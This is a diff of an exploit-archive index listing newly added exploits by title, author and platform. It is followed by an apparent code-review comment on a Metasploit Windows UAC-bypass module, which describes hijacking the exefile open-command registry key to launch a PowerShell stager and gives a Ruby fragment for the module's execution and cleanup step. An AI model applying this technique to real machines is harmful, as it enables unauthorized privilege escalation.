 44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86,
-44516,exploits/windows/local/44516.py,"R 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows,
+44516,exploits/windows/local/44516.py,"RGui 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows,
 44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows,
 44523,exploits/linux/local/44523.rb,"lastore-daemon D-Bus - Privilege Escalation (Metasploit)",2018-04-24,Metasploit,local,linux,
 44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows,
@@ -9755,6 +9755,8 @@ id,file,description,date,author,type,platform,port
 44818,exploits/hardware/local/44818.md,"Sony Playstation 4 (PS4) 5.07 - 'Jailbreak' WebKit / 'bpf v2' Kernel Loader",2018-05-28,Specter,local,hardware,
 44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware,
 44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware,
+44828,exploits/windows/local/44828.py,"Zip-n-Go 4.9 - Buffer Overflow (SEH)",2018-06-04,"Hashim Jawad",local,windows,
+44830,exploits/windows/local/44830.rb,"Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16540,6 +16542,7 @@ id,file,description,date,author,type,platform,port
 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
+44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39489,5 +39492,7 @@ id,file,description,date,author,type,platform,port
 44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
 44823,exploits/php/webapps/44823.txt,"Smartshop 1 - 'id' SQL Injection",2018-06-03,L0RD,webapps,php,
 44824,exploits/php/webapps/44824.html,"Smartshop 1 - Cross-Site Request Forgery",2018-06-03,L0RD,webapps,php,
-44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,longer,webapps,php,
-44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,longer,webapps,php,
+44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,xichao,webapps,php,
+44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,xichao,webapps,php,
+44827,exploits/java/webapps/44827.txt,"SearchBlox 8.6.7 - XML External Entity Injection",2018-06-04,"Ahmet Gurel",webapps,java,
+44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,
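Review bot: The hijack of `HKCU\Software\Classes\exefile\shell\open\command` in `exploit` is only reverted on the success path; if `client.sys.process.execute`, `handler` or the session itself raises between the `registry_setvaldata` calls and the "Cleaining" block, the user is left with every `.exe` launch redirected to the PowerShell stager, a persistent change that the module description explicitly promises is undone. Wrap the execute/sleep/handler sequence in `begin … ensure … end` so the restore always runs. Two smaller points in the same hunk: the `'References'` entry is one flat array `['URL', url, 'URL', url]` instead of two `['URL', url]` pairs, and the oversized-payload branch uses `Failure::None` where `Failure::BadConfig` is the matching code. The cleanup also deletes the whole `exefile` key via `SLUI_DEL_KEY` whenever the `(Default)` value read back empty, which would remove a pre-existing user key that merely had no default; testing key existence rather than value emptiness would be safer.
```ruby
    cmd_path = expand_path(commspec)
    cmd_args = expand_path("Start-Process #{SLUI_PATH} -Verb runas")
    print_status("Executing payload: #{cmd_path} #{cmd_args}")

    begin
      # We can't use cmd_exec here because it blocks, waiting for a result.
      client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true)
      sleep(3)
      handler(client)
    ensure
      print_status("Cleaning ...")
      # … unchanged: DelegateExecute / (Default) / payload-value restore and key deletion …
    end
```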